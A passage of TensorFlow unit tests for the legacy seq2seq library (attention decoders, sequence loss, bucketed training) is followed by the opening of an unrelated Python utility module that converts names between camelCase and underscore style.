1, dtypes.int32, shape=[2]) for i in range(2)
]
dec_inp = [
constant_op.constant(
i, dtypes.int32, shape=[2]) for i in range(3)
]
cell_fn = lambda: core_rnn_cell_impl.BasicLSTMCell(2)
cell = cell_fn()
dec, mem = seq2seq_lib.embedding_rnn_seq2seq(
enc_inp,
dec_inp,
cell,
num_encoder_symbols=2,
num_decoder_symbols=5,
embedding_size=2)
sess.run([variables.global_variables_initializer()])
res = sess.run(dec)
self.assertEqual(3, len(res))
self.assertEqual((2, 5), res[0].shape)
res = sess.run([mem])
self.assertEqual((2, 2), res[0].c.shape)
self.assertEqual((2, 2), res[0].h.shape)
# Test with state_is_tuple=False.
with variable_scope.variable_scope("no_tuple"):
cell_nt = core_rnn_cell_impl.BasicLSTMCell(2, state_is_tuple=False)
dec, mem = seq2seq_lib.embedding_rnn_seq2seq(
enc_inp,
dec_inp,
cell_nt,
num_encoder_symbols=2,
num_decoder_symbols=5,
embedding_size=2)
sess.run([variables.global_variables_initializer()])
res = sess.run(dec)
self.assertEqual(3, len(res))
self.assertEqual((2, 5), res[0].shape)
res = sess.run([mem])
self.assertEqual((2, 4), res[0].shape)
# Test externally provided output projection.
w = variable_scope.get_variable("proj_w", [2, 5])
b = variable_scope.get_variable("proj_b", [5])
with variable_scope.variable_scope("proj_seq2seq"):
dec, _ = seq2seq_lib.embedding_rnn_seq2seq(
enc_inp,
dec_inp,
cell_fn(),
num_encoder_symbols=2,
num_decoder_symbols=5,
embedding_size=2,
output_projection=(w, b))
sess.run([variables.global_variables_initializer()])
res = sess.run(dec)
self.assertEqual(3, len(res))
self.assertEqual((2, 2), res[0].shape)
# Test that previous-feeding model ignores inputs after the first.
dec_inp2 = [
constant_op.constant(
0, dtypes.int32, shape=[2]) for _ in range(3)
]
with variable_scope.variable_scope("other"):
d3, _ = seq2seq_lib.embedding_rnn_seq2seq(
enc_inp,
dec_inp2,
cell_fn(),
num_encoder_symbols=2,
num_decoder_symbols=5,
embedding_size=2,
feed_previous=constant_op.constant(True))
sess.run([variables.global_variables_initializer()])
variable_scope.get_variable_scope().reuse_variables()
d1, _ = seq2seq_lib.embedding_rnn_seq2seq(
enc_inp,
dec_inp,
cell_fn(),
num_encoder_symbols=2,
num_decoder_symbols=5,
embedding_size=2,
feed_previous=True)
d2, _ = seq2seq_lib.embedding_rnn_seq2seq(
enc_inp,
dec_inp2,
cell_fn(),
num_encoder_symbols=2,
num_decoder_symbols=5,
embedding_size=2,
feed_previous=True)
res1 = sess.run(d1)
res2 = sess.run(d2)
res3 = sess.run(d3)
self.assertAllClose(res1, res2)
self.assertAllClose(res1, res3)
def testEmbeddingTiedRNNSeq2Seq(self):
with self.test_session() as sess:
with variable_scope.variable_scope(
"root", initializer=init_ops.constant_initializer(0.5)):
enc_inp = [
constant_op.constant(
1, dtypes.int32, shape=[2]) for i in range(2)
]
dec_inp = [
constant_op.constant(
i, dtypes.int32, shape=[2]) for i in range(3)
]
cell = functools.partial(
core_rnn_cell_impl.BasicLSTMCell,
2, state_is_tuple=True)
dec, mem = seq2seq_lib.embedding_tied_rnn_seq2seq(
enc_inp, dec_inp, cell(), num_symbols=5, embedding_size=2)
sess.run([variables.global_variables_initializer()])
res = sess.run(dec)
self.assertEqual(3, len(res))
self.assertEqual((2, 5), res[0].shape)
res = sess.run([mem])
self.assertEqual((2, 2), res[0].c.shape)
self.assertEqual((2, 2), res[0].h.shape)
# Test when num_decoder_symbols is provided, the size of decoder output
# is num_decoder_symbols.
with variable_scope.variable_scope("decoder_symbols_seq2seq"):
dec, mem = seq2seq_lib.embedding_tied_rnn_seq2seq(
enc_inp,
dec_inp,
cell(),
num_symbols=5,
num_decoder_symbols=3,
embedding_size=2)
sess.run([variables.global_variables_initializer()])
res = sess.run(dec)
self.assertEqual(3, len(res))
self.assertEqual((2, 3), res[0].shape)
# Test externally provided output projection.
w = variable_scope.get_variable("proj_w", [2, 5])
b = variable_scope.get_variable("proj_b", [5])
with variable_scope.variable_scope("proj_seq2seq"):
dec, _ = seq2seq_lib.embedding_tied_rnn_seq2seq(
enc_inp,
dec_inp,
cell(),
num_symbols=5,
embedding_size=2,
output_projection=(w, b))
sess.run([variables.global_variables_initializer()])
res = sess.run(dec)
self.assertEqual(3, len(res))
self.assertEqual((2, 2), res[0].shape)
# Test that previous-feeding model ignores inputs after the first.
dec_inp2 = [constant_op.constant(0, dtypes.int32, shape=[2])] * 3
with variable_scope.variable_scope("other"):
d3, _ = seq2seq_lib.embedding_tied_rnn_seq2seq(
enc_inp,
dec_inp2,
cell(),
num_symbols=5,
embedding_size=2,
feed_previous=constant_op.constant(True))
sess.run([variables.global_variables_initializer()])
variable_scope.get_variable_scope().reuse_variables()
d1, _ = seq2seq_lib.embedding_tied_rnn_seq2seq(
enc_inp,
dec_inp,
cell(),
num_symbols=5,
embedding_size=2,
feed_previous=True)
d2, _ = seq2seq_lib.embedding_tied_rnn_seq2seq(
enc_inp,
dec_inp2,
cell(),
num_symbols=5,
embedding_size=2,
feed_previous=True)
res1 = sess.run(d1)
res2 = sess.run(d2)
res3 = sess.run(d3)
self.assertAllClose(res1, res2)
self.assertAllClose(res1, res3)
def testAttentionDecoder1(self):
with self.test_session() as sess:
with variable_scope.variable_scope(
"root", initializer=init_ops.constant_initializer(0.5)):
cell_fn = lambda: core_rnn_cell_impl.GRUCell(2)
cell = cell_fn()
inp = [constant_op.constant(0.5, shape=[2, 2])] * 2
enc_outputs, enc_state = core_rnn.static_rnn(
cell, inp, dtype=dtypes.float32)
attn_states = array_ops.concat([
array_ops.reshape(e, [-1, 1, cell.output_size]) for e in enc_outputs
], 1)
dec_inp = [constant_op.constant(0.4, shape=[2, 2])] * 3
# Create a new cell instance for the decoder, since it uses a
# different variable scope
dec, mem = seq2seq_lib.attention_decoder(
dec_inp, enc_state, attn_states, cell_fn(), output_size=4)
sess.run([variables.global_variables_initializer()])
res = sess.run(dec)
self.assertEqual(3, len(res))
self.assertEqual((2, 4), res[0].shape)
res = sess.run([mem])
self.assertEqual((2, 2), res[0].shape)
def testAttentionDecoder2(self):
with self.test_session() as sess:
with variable_scope.variable_scope(
"root", initializer=init_ops.constant_initializer(0.5)):
cell_fn = lambda: core_rnn_cell_impl.GRUCell(2)
cell = cell_fn()
inp = [constant_op.constant(0.5, shape=[2, 2])] * 2
enc_outputs, enc_state = core_rnn.static_rnn(
cell, inp, dtype=dtypes.float32)
attn_states = array_ops.concat([
array_ops.reshape(e, [-1, 1, cell.output_size]) for e in enc_outputs
], 1)
dec_inp = [constant_op.constant(0.4, shape=[2, 2])] * 3
# Use a new cell instance since the attention decoder uses a
# different variable scope.
dec, mem = seq2seq_lib.attention_decoder(
dec_inp, enc_state, attn_states, cell_fn(),
output_size=4, num_heads=2)
sess.run([variables.global_variables_initializer()])
res = sess.run(dec)
self.assertEqual(3, len(res))
self.assertEqual((2, 4), res[0].shape)
res = sess.run([mem])
self.assertEqual((2, 2), res[0].shape)
def testDynamicAttentionDecoder1(self):
with self.test_session() as sess:
with variable_scope.variable_scope(
"root", initializer=init_ops.constant_initializer(0.5)):
cell_fn = lambda: core_rnn_cell_impl.GRUCell(2)
cell = cell_fn()
inp = constant_op.constant(0.5, shape=[2, 2, 2])
enc_outputs, enc_state = rnn.dynamic_rnn(
cell, inp, dtype=dtypes.float32)
attn_states = enc_outputs
dec_inp = [constant_op.constant(0.4, shape=[2, 2])] * 3
# Use a new cell instance since the attention decoder uses a
# different variable scope.
dec, mem = seq2seq_lib.attention_decoder(
dec_inp, enc_state, attn_states, cell_fn(), output_size=4)
sess.run([variables.global_variables_initializer()])
res = sess.run(dec)
self.assertEqual(3, len(res))
self.assertEqual((2, 4), res[0].shape)
res = sess.run([mem])
self.assertEqual((2, 2), res[0].shape)
def testDynamicAttentionDecoder2(self):
with self.test_session() as sess:
with variable_scope.variable_scope(
"root", initializer=init_ops.constant_initializer(0.5)):
cell_fn = lambda: core_rnn_cell_impl.GRUCell(2)
cell = cell_fn()
inp = constant_op.constant(0.5, shape=[2, 2, 2])
enc_outputs, enc_state = rnn.dynamic_rnn(
cell, inp, dtype=dtypes.float32)
attn_states = enc_outputs
dec_inp = [constant_op.constant(0.4, shape=[2, 2])] * 3
# Use a new cell instance since the attention decoder uses a
# different variable scope.
dec, mem = seq2seq_lib.attention_decoder(
dec_inp, enc_state, attn_states, cell_fn(),
output_size=4, num_heads=2)
sess.run([variables.global_variables_initializer()])
res = sess.run(dec)
self.assertEqual(3, len(res))
self.assertEqual((2, 4), res[0].shape)
res = sess.run([mem])
self.assertEqual((2, 2), res[0].shape)
def testAttentionDecoderStateIsTuple(self):
with self.test_session() as sess:
with variable_scope.variable_scope(
"root", initializer=init_ops.constant_initializer(0.5)):
single_cell = lambda: core_rnn_cell_impl.BasicLSTMCell( # pylint: disable=g-long-lambda
2, state_is_tuple=True)
cell_fn = lambda: core_rnn_cell_impl.MultiRNNCell( # pylint: disable=g-long-lambda
cells=[single_cell() for _ in range(2)], state_is_tuple=True)
cell = cell_fn()
inp = [constant_op.constant(0.5, shape=[2, 2])] * 2
enc_outputs, enc_state = core_rnn.static_rnn(
cell, inp, dtype=dtypes.float32)
attn_states = array_ops.concat([
array_ops.reshape(e, [-1, 1, cell.output_size]) for e in enc_outputs
], 1)
dec_inp = [constant_op.constant(0.4, shape=[2, 2])] * 3
# Use a new cell instance since the attention decoder uses a
# different variable scope.
dec, mem = seq2seq_lib.attention_decoder(
dec_inp, enc_state, attn_states, cell_fn(), output_size=4)
sess.run([variables.global_variables_initializer()])
res = sess.run(dec)
self.assertEqual(3, len(res))
self.assertEqual((2, 4), res[0].shape)
res = sess.run([mem])
self.assertEqual(2, len(res[0]))
self.assertEqual((2, 2), res[0][0].c.shape)
self.assertEqual((2, 2), res[0][0].h.shape)
self.assertEqual((2, 2), res[0][1].c.shape)
self.assertEqual((2, 2), res[0][1].h.shape)
def testDynamicAttentionDecoderStateIsTuple(self):
with self.test_session() as sess:
with variable_scope.variable_scope(
"root", initializer=init_ops.constant_initializer(0.5)):
cell_fn = lambda: core_rnn_cell_impl.MultiRNNCell( # pylint: disable=g-long-lambda
cells=[core_rnn_cell_impl.BasicLSTMCell(2) for _ in range(2)])
cell = cell_fn()
inp = constant_op.constant(0.5, shape=[2, 2, 2])
enc_outputs, enc_state = core_rnn.static_rnn(
cell, inp, dtype=dtypes.float32)
attn_states = array_ops.concat([
array_ops.reshape(e, [-1, 1, cell.output_size])
for e in enc_outputs
], 1)
dec_inp = [constant_op.constant(0.4, shape=[2, 2])] * 3
# Use a new cell instance since the attention decoder uses a
# different variable scope.
dec, mem = seq2seq_lib.attention_decoder(
dec_inp, enc_state, attn_states, cell_fn(), output_size=4)
sess.run([variables.global_variables_initializer()])
res = sess.run(dec)
self.assertEqual(3, len(res))
self.assertEqual((2, 4), res[0].shape)
res = sess.run([mem])
self.assertEqual(2, len(res[0]))
self.assertEqual((2, 2), res[0][0].c.shape)
self.assertEqual((2, 2), res[0][0].h.shape)
self.assertEqual((2, 2), res[0][1].c.shape)
self.assertEqual((2, 2), res[0][1].h.shape)
def testEmbeddingAttentionDecoder(self):
with self.test_session() as sess:
with variable_scope.variable_scope(
"root", initializer=init_ops.constant_initializer(0.5)):
inp = [constant_op.constant(0.5, shape=[2, 2])] * 2
cell_fn = lambda: core_rnn_cell_impl.GRUCell(2)
cell = cell_fn()
enc_outputs, enc_state = core_rnn.static_rnn(
cell, inp, dtype=dtypes.float32)
attn_states = array_ops.concat([
array_ops.reshape(e, [-1, 1, cell.output_size]) for e in enc_outputs
], 1)
dec_inp = [
constant_op.constant(
i, dtypes.int32, shape=[2]) for i in range(3)
]
# Use a new cell instance since the attention decoder uses a
# different variable scope.
dec, mem = seq2seq_lib.embedding_attention_decoder(
dec_inp,
enc_state,
attn_states,
cell_fn(),
num_symbols=4,
embedding_size=2,
output_size=3)
sess.run([variables.global_variables_initializer()])
res = sess.run(dec)
self.assertEqual(3, len(res))
self.assertEqual((2, 3), res[0].shape)
res = sess.run([mem])
self.assertEqual((2, 2), res[0].shape)
def testEmbeddingAttentionSeq2Seq(self):
with self.test_session() as sess:
with variable_scope.variable_scope(
"root", initializer=init_ops.constant_initializer(0.5)):
enc_inp = [
constant_op.constant(
1, dtypes.int32, shape=[2]) for i in range(2)
]
dec_inp = [
constant_op.constant(
i, dtypes.int32, shape=[2]) for i in range(3)
]
cell_fn = lambda: core_rnn_cell_impl.BasicLSTMCell(2)
cell = cell_fn()
dec, mem = seq2seq_lib.embedding_attention_seq2seq(
enc_inp,
dec_inp,
cell,
num_encoder_symbols=2,
num_decoder_symbols=5,
embedding_size=2)
sess.run([variables.global_variables_initializer()])
res = sess.run(dec)
self.assertEqual(3, len(res))
self.assertEqual((2, 5), res[0].shape)
res = sess.run([mem])
self.assertEqual((2, 2), res[0].c.shape)
self.assertEqual((2, 2), res[0].h.shape)
# Test with state_is_tuple=False.
with variable_scope.variable_scope("no_tuple"):
cell_fn = functools.partial(
core_rnn_cell_impl.BasicLSTMCell,
2, state_is_tuple=False)
cell_nt = cell_fn()
dec, mem = seq2seq_lib.embedding_attention_seq2seq(
enc_inp,
dec_inp,
cell_nt,
num_encoder_symbols=2,
num_decoder_symbols=5,
embedding_size=2)
sess.run([variables.global_variables_initializer()])
res = sess.run(dec)
self.assertEqual(3, len(res))
self.assertEqual((2, 5), res[0].shape)
res = sess.run([mem])
self.assertEqual((2, 4), res[0].shape)
# Test externally provided output projection.
w = variable_scope.get_variable("proj_w", [2, 5])
b = variable_scope.get_variable("proj_b", [5])
with variable_scope.variable_scope("proj_seq2seq"):
dec, _ = seq2seq_lib.embedding_attention_seq2seq(
enc_inp,
dec_inp,
cell_fn(),
num_encoder_symbols=2,
num_decoder_symbols=5,
embedding_size=2,
output_projection=(w, b))
sess.run([variables.global_variables_initializer()])
res = sess.run(dec)
self.assertEqual(3, len(res))
self.assertEqual((2, 2), res[0].shape)
# TODO(ebrevdo, lukaszkaiser): Re-enable once RNNCells allow reuse
# within a variable scope that already has a weights tensor.
#
# # Test that previous-feeding model ignores inputs after the first.
# dec_inp2 = [
# constant_op.constant(
# 0, dtypes.int32, shape=[2]) for _ in range(3)
# ]
# with variable_scope.variable_scope("other"):
# d3, _ = seq2seq_lib.embedding_attention_seq2seq(
# enc_inp,
# dec_inp2,
# cell_fn(),
# num_encoder_symbols=2,
# num_decoder_symbols=5,
# embedding_size=2,
# feed_previous=constant_op.constant(True))
# sess.run([variables.global_variables_initializer()])
# variable_scope.get_variable_scope().reuse_variables()
# cell = cell_fn()
# d1, _ = seq2seq_lib.embedding_attention_seq2seq(
# enc_inp,
# dec_inp,
# cell,
# num_encoder_symbols=2,
# num_decoder_symbols=5,
# embedding_size=2,
# feed_previous=True)
# d2, _ = seq2seq_lib.embedding_attention_seq2seq(
# enc_inp,
# dec_inp2,
# cell,
# num_encoder_symbols=2,
# num_decoder_symbols=5,
# embedding_size=2,
# feed_previous=True)
# res1 = sess.run(d1)
# res2 = sess.run(d2)
# res3 = sess.run(d3)
# self.assertAllClose(res1, res2)
# self.assertAllClose(res1, res3)
def testOne2ManyRNNSeq2Seq(self):
with self.test_session() as sess:
with variable_scope.variable_scope(
"root", initializer=init_ops.constant_initializer(0.5)):
enc_inp = [
constant_op.constant(
1, dtypes.int32, shape=[2]) for i in range(2)
]
dec_inp_dict = {}
dec_inp_dict["0"] = [
constant_op.constant(
i, dtypes.int32, shape=[2]) for i in range(3)
]
dec_inp_dict["1"] = [
constant_op.constant(
i, dtypes.int32, shape=[2]) for i in range(4)
]
dec_symbols_dict = {"0": 5, "1": 6}
cell = core_rnn_cell_impl.BasicLSTMCell(2, state_is_tuple=True)
outputs_dict, state_dict = (seq2seq_lib.one2many_rnn_seq2seq(
enc_inp, dec_inp_dict, cell, 2, dec_symbols_dict, embedding_size=2))
sess.run([variables.global_variables_initializer()])
res = sess.run(outputs_dict["0"])
self.assertEqual(3, len(res))
self.assertEqual((2, 5), res[0].shape)
res = sess.run(outputs_dict["1"])
self.assertEqual(4, len(res))
self.assertEqual((2, 6), res[0].shape)
res = sess.run([state_dict["0"]])
self.assertEqual((2, 2), res[0].c.shape)
self.assertEqual((2, 2), res[0].h.shape)
res = sess.run([state_dict["1"]])
self.assertEqual((2, 2), res[0].c.shape)
self.assertEqual((2, 2), res[0].h.shape)
# Test that previous-feeding model ignores inputs after the first, i.e.
# dec_inp_dict2 has different inputs from dec_inp_dict after the first
# time-step.
dec_inp_dict2 = {}
dec_inp_dict2["0"] = [
constant_op.constant(
0, dtypes.int32, shape=[2]) for _ in range(3)
]
dec_inp_dict2["1"] = [
constant_op.constant(
0, dtypes.int32, shape=[2]) for _ in range(4)
]
with variable_scope.variable_scope("other"):
outputs_dict3, _ = seq2seq_lib.one2many_rnn_seq2seq(
enc_inp,
dec_inp_dict2,
cell,
2,
dec_symbols_dict,
embedding_size=2,
feed_previous=constant_op.constant(True))
sess.run([variables.global_variables_initializer()])
variable_scope.get_variable_scope().reuse_variables()
outputs_dict1, _ = seq2seq_lib.one2many_rnn_seq2seq(
enc_inp,
dec_inp_dict,
cell,
2,
dec_symbols_dict,
embedding_size=2,
feed_previous=True)
outputs_dict2, _ = seq2seq_lib.one2many_rnn_seq2seq(
enc_inp,
dec_inp_dict2,
cell,
2,
dec_symbols_dict,
embedding_size=2,
feed_previous=True)
res1 = sess.run(outputs_dict1["0"])
res2 = sess.run(outputs_dict2["0"])
res3 = sess.run(outputs_dict3["0"])
self.assertAllClose(res1, res2)
self.assertAllClose(res1, res3)
def testSequenceLoss(self):
with self.test_session() as sess:
logits = [constant_op.constant(i + 0.5, shape=[2, 5]) for i in range(3)]
targets = [
constant_op.constant(
i, dtypes.int32, shape=[2]) for i in range(3)
]
weights = [constant_op.constant(1.0, shape=[2]) for i in range(3)]
average_loss_per_example = seq2seq_lib.sequence_loss(
logits,
targets,
weights,
average_across_timesteps=True,
average_across_batch=True)
res = sess.run(average_loss_per_example)
self.assertAllClose(1.60944, res)
average_loss_per_sequence = seq2seq_lib.sequence_loss(
logits,
targets,
weights,
average_across_timesteps=False,
average_across_batch=True)
res = sess.run(average_loss_per_sequence)
self.assertAllClose(4.828314, res)
total_loss = seq2seq_lib.sequence_loss(
logits,
targets,
weights,
average_across_timesteps=False,
average_across_batch=False)
res = sess.run(total_loss)
self.assertAllClose(9.656628, res)
def testSequenceLossByExample(self):
with self.test_session() as sess:
output_classes = 5
logits = [
constant_op.constant(
i + 0.5, shape=[2, output_classes]) for i in range(3)
]
targets = [
constant_op.constant(
i, dtypes.int32, shape=[2]) for i in range(3)
]
weights = [constant_op.constant(1.0, shape=[2]) for i in range(3)]
average_loss_per_example = (seq2seq_lib.sequence_loss_by_example(
logits, targets, weights, average_across_timesteps=True))
res = sess.run(average_loss_per_example)
self.assertAllClose(np.asarray([1.609438, 1.609438]), res)
loss_per_sequence = seq2seq_lib.sequence_loss_by_example(
logits, targets, weights, average_across_timesteps=False)
res = sess.run(loss_per_sequence)
self.assertAllClose(np.asarray([4.828314, 4.828314]), res)
# TODO(ebrevdo, lukaszkaiser): Re-enable once RNNCells allow reuse
# within a variable scope that already has a weights tensor.
#
# def testModelWithBucketsScopeAndLoss(self):
# """Test variable scope reuse is not reset after model_with_buckets."""
# classes = 10
# buckets = [(4, 4), (8, 8)]
# with self.test_session():
# # Here comes a sample Seq2Seq model using GRU cells.
# def SampleGRUSeq2Seq(enc_inp, dec_inp, weights, per_example_loss):
# """Example sequence-to-sequence model that uses GRU cells."""
# def GRUSeq2Seq(enc_inp, dec_inp):
# cell = core_rnn_cell_impl.MultiRNNCell(
# [core_rnn_cell_impl.GRUCell(24) for _ in range(2)])
# return seq2seq_lib.embedding_attention_seq2seq(
# enc_inp,
# dec_inp,
# cell,
# num_encoder_symbols=classes,
# num_decoder_symbols=classes,
# embedding_size=24)
# targets = [dec_inp[i + 1] for i in range(len(dec_inp) - 1)] + [0]
# return seq2seq_lib.model_with_buckets(
# enc_inp,
# dec_inp,
# targets,
# weights,
# buckets,
# GRUSeq2Seq,
# per_example_loss=per_example_loss)
# # Now we construct the copy model.
# inp = [
# array_ops.placeholder(
# dtypes.int32, shape=[None]) for _ in range(8)
# ]
# out = [
# array_ops.placeholder(
# dtypes.int32, shape=[None]) for _ in range(8)
# ]
# weights = [
# array_ops.ones_like(
# inp[0], dtype=dtypes.float32) for _ in range(8)
# ]
# with variable_scope.variable_scope("root"):
# _, losses1 = SampleGRUSeq2Seq(
# inp, out, weights, per_example_loss=False)
# # Now check that we did not accidentally set reuse.
# self.assertEqual(False, variable_scope.get_variable_scope().reuse)
# with variable_scope.variable_scope("new"):
# _, losses2 = SampleGRUSeq2Seq
# inp, out, weights, per_example_loss=True)
# # First loss is scalar, the second one is a 1-dimensinal tensor.
# self.assertEqual([], losses1[0].get_shape().as_list())
# self.assertEqual([None], losses2[0].get_shape().as_list())
def testModelWithBuckets(self):
"""Larger tests that does full sequence-to-sequence model training."""
# We learn to copy 10 symbols in 2 buckets: length 4 and length 8.
classes = 10
buckets = [(4, 4), (8, 8)]
perplexities = [[], []] # Results for each bucket.
random_seed.set_random_seed(111)
random.seed(111)
np.random.seed(111)
with self.test_session() as sess:
# We use sampled softmax so we keep output projection separate.
w = variable_scope.get_variable("proj_w", [24, classes])
w_t = array_ops.transpose(w)
b = variable_scope.get_variable("proj_b", [classes])
# Here comes a sample Seq2Seq model using GRU cells.
def SampleGRUSeq2Seq(enc_inp, dec_inp, weights):
"""Example sequence-to-sequence model that uses GRU cells."""
def GRUSeq2Seq(enc_inp, dec_inp):
cell = core_rnn_cell_impl.MultiRNNCell(
[core_rnn_cell_impl.GRUCell(24) for _ in range(2)],
state_is_tuple=True)
return seq2seq_lib.embedding_attention_seq2seq(
enc_inp,
dec_inp,
cell,
num_encoder_symbols=classes,
num_decoder_symbols=classes,
embedding_size=24,
output_projection=(w, b))
targets = [dec_inp[i + 1] for i in range(len(dec_inp) - 1)] + [0]
def SampledLoss(labels, inputs):
labels = array_ops.reshape(labels, [-1, 1])
return nn_impl.sampled_softmax_loss(
weights=w_t,
biases=b,
labels=labels,
inputs=inputs,
num_sampled=8,
num_classes=classes)
return seq2seq_lib.model_with_buckets(
enc_inp,
dec_inp,
targets,
weights,
buckets,
GRUSeq2Seq,
softmax_loss_function=SampledLoss)
# Now we construct the copy model.
batch_size = 8
inp = [
array_ops.placeholder(
dtypes.int32, shape=[None]) for _ in range(8)
]
out = [
array_ops.placeholder(
dtypes.int32, shape=[None]) for _ in range(8)
]
weights = [
array_ops.ones_like(
inp[0], dtype=dtypes.float32) for _ in range(8)
]
with variable_scope.variable_scope("root"):
_, losses = SampleGRUSeq2Seq(inp, out, weights)
updates = []
params = variables.all_variables()
optimizer = adam.AdamOptimizer(0.03, epsilon=1e-5)
for i in range(len(buckets)):
full_grads = gradients_impl.gradients(losses[i], params)
grads, _ = clip_ops.clip_by_global_norm(full_grads, 30.0)
update = optimizer.apply_gradients(zip(grads, params))
updates.append(update)
sess.run([variables.global_variables_initializer()])
steps = 6
for _ in range(steps):
bucket = random.choice(np.arange(len(buckets)))
length = buckets[bucket][0]
i = [
np.array(
[np.random.randint(9) + 1 for _ in range(batch_size)],
dtype=np.int32) for _ in range(length)
]
# 0 is our "GO" symbol here.
o = [np.array([0] * batch_size, dtype=np.int32)] + i
feed = {}
for i1, i2, o1, o2 in zip(inp[:length], i[:length], out[:length],
o[:length]):
feed[i1.name] = i2
feed[o1.name] = o2
if length < 8: # For the 4-bucket, we need the 5th as target.
feed[out[length].name] = o[length]
res = sess.run([updates[bucket], losses[bucket]], feed)
perplexities[bucket].append(math.exp(float(res[1])))
for bucket in range(len(buckets)):
if len(perplexities[bucket]) > 1: # Assert that perplexity went down.
self.assertLess(perplexities[bucket][-1], # 10% margin of error.
1.1 * perplexities[bucket][0])
def testModelWithBooleanFeedPrevious(self):
"""Test the model behavior when feed_previous is True.
For example, the following two cases have the same effect:
- Train `embedding_rnn_seq2seq` with `feed_previous=True`, which contains
a `embedding_rnn_decoder` with `feed_previous=True` and
`update_embedding_for_previous=True`. The decoder is fed with "<Go>"
and outputs "A, B, C".
- Train `embedding_rnn_seq2seq` with `feed_previous=False`. The decoder
is fed with "<Go>, A, B".
"""
num_encoder_symbols = 3
num_decoder_symbols = 5
batch_size = 2
num_enc_timesteps = 2
num_dec_timesteps = 3
def TestModel(seq2seq):
with self.test_session(graph=ops.Graph()) as sess:
random_seed.set_random_seed(111)
random.seed(111)
np.random.seed(111)
enc_inp = [
constant_op.constant(
i + 1, dtypes.int32, shape=[batch_size])
for i in range(num_enc_timesteps)
]
dec_inp_fp_true = [
constant_op.constant(
i, dtypes.int32, shape=[batch_size])
for i in range(num_dec_timesteps)
]
dec_inp_holder_fp_false = [
array_ops.placeholder(
dtypes.int32, shape=[batch_size])
for _ in range(num_dec_timesteps)
]
targets = [
constant_op.constant(
i + 1, dtypes.int32, shape=[batch_size])
for i in range(num_dec_timesteps)
]
weights = [
constant_op.constant(
1.0, shape=[batch_size]) for i in range(num_dec_timesteps)
]
def ForwardBackward(enc_inp, dec_inp, feed_previous):
scope_name = "fp_{}".format(feed_previous)
with variable_scope.variable_scope(scope_name):
dec_op, _ = seq2seq(enc_inp, dec_inp, feed_previous=feed_previous)
net_variables = ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES,
scope_name)
optimizer = adam.AdamOptimizer(0.03, epsilon=1e-5)
update_op = optimizer.minimize(
seq2seq_lib.sequence_loss(dec_op, targets, weights),
var_list=net_variables)
return dec_op, update_op, net_variables
dec_op_fp_true, update_fp_true, variables_fp_true = ForwardBackward(
enc_inp, dec_inp_fp_true, feed_previous=True)
dec_op_fp_false, update_fp_false, variables_fp_false = ForwardBackward(
enc_inp, dec_inp_holder_fp_false, feed_previous=False)
sess.run(variables.global_variables_initializer())
# We only check consistencies between the variables existing in both
# the models with True and False feed_previous. Variables created by
# the loop_function in the model with True feed_previous are ignored.
v_false_name_dict = {
v.name.split("/", 1)[-1]: v
for v in variables_fp_false
}
matched_variables = [(v, v_false_name_dict[v.name.split("/", 1)[-1]])
for v in variables_fp_true]
for v_true, v_false in matched_variables:
sess.run(state_ops.assign(v_false, v_true))
# Take the symbols generated by the decoder with feed_previous=True as
# the true input symbols for the decoder with feed_previous=False.
dec_fp_true = sess.run(dec_op_fp_true)
output_symbols_fp_true = np.argmax(dec_fp_true, axis=2)
dec_inp_fp_false = np.vstack((dec_inp_fp_true[0].eval(),
output_symbols_fp_true[:-1]))
sess.run(update_fp_true)
sess.run(update_fp_false, {
holder: inp
for holder, inp in zip(dec_inp_holder_fp_false, dec_inp_fp_false)
})
for v_true, v_false in matched_variables:
self.assertAllClose(v_true.eval(), v_false.eval())
def EmbeddingRNNSeq2SeqF(enc_inp, dec_inp, feed_previous):
cell = core_rnn_cell_impl.BasicLSTMCell(2, state_is_tuple=True)
return seq2seq_lib.embedding_rnn_seq2seq(
enc_inp,
dec_inp,
cell,
num_encoder_symbols,
num_decoder_symbols,
embedding_size=2,
feed_previous=feed_previous)
def EmbeddingRNNSeq2SeqNoTupleF(enc_inp, dec_inp, feed_previous):
cell = core_rnn_cell_impl.BasicLSTMCell(2, state_is_tuple=False)
return seq2seq_lib.embedding_rnn_seq2seq(
enc_inp,
dec_inp,
cell,
num_encoder_symbols,
num_decoder_symbols,
embedding_size=2,
feed_previous=feed_previous)
def EmbeddingTiedRNNSeq2Seq(enc_inp, dec_inp, feed_previous):
cell = core_rnn_cell_impl.BasicLSTMCell(2, state_is_tuple=True)
return seq2seq_lib.embedding_tied_rnn_seq2seq(
enc_inp,
dec_inp,
cell,
num_decoder_symbols,
embedding_size=2,
feed_previous=feed_previous)
def EmbeddingTiedRNNSeq2SeqNoTuple(enc_inp, dec_inp, feed_previous):
cell = core_rnn_cell_impl.BasicLSTMCell(2, state_is_tuple=False)
return seq2seq_lib.embedding_tied_rnn_seq2seq(
enc_inp,
dec_inp,
cell,
num_decoder_symbols,
embedding_size=2,
feed_previous=feed_previous)
def EmbeddingAttentionSeq2Seq(enc_inp, dec_inp, feed_previous):
cell = core_rnn_cell_impl.BasicLSTMCell(2, state_is_tuple=True)
return seq2seq_lib.embedding_attention_seq2seq(
enc_inp,
dec_inp,
cell,
num_encoder_symbols,
num_decoder_symbols,
embedding_size=2,
feed_previous=feed_previous)
def EmbeddingAttentionSeq2SeqNoTuple(enc_inp, dec_inp, feed_previous):
cell = core_rnn_cell_impl.BasicLSTMCell(2, state_is_tuple=False)
return seq2seq_lib.embedding_attention_seq2seq(
enc_inp,
dec_inp,
cell,
num_encoder_symbols,
num_decoder_symbols,
embedding_size=2,
feed_previous=feed_previous)
for model in (EmbeddingRNNSeq2SeqF, EmbeddingRNNSeq2SeqNoTupleF,
EmbeddingTiedRNNSeq2Seq, EmbeddingTiedRNNSeq2SeqNoTuple,
EmbeddingAttentionSeq2Seq, EmbeddingAttentionSeq2SeqNoTuple):
TestModel(model)
if __name__ == "__main__":
test.main()
|
# coding: utf-8
import re
import unicodedata
from urllib import quote_plus
class NestedDict(dict):
def __getitem__(self, key):
if key in self:
return self.get(key)
return self.setdefault(key, NestedDict())
def convert_to_underscore(name):
s1 = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', name)
return re.sub('([a-z0-9])([A-Z])', r'\1_\2', s1).lower()
def convert_to_camelcase(name):
return re.sub(r'(?!^)_([a-zA-Z])', lambda m: m.group(1).upper(), name)
def convert_json(d):
if not isinstance(d, dict):
return d
new_d = {}
for k, v in d.iteritems():
if isinstance(v, (list, tuple)):
new_d[convert_to_underscore(k)] = [convert_json(i) for i in v]
else:
new_d[convert_to_underscore(k)] = convert_json(v)
return new_d
def urlencode_utf8(params):
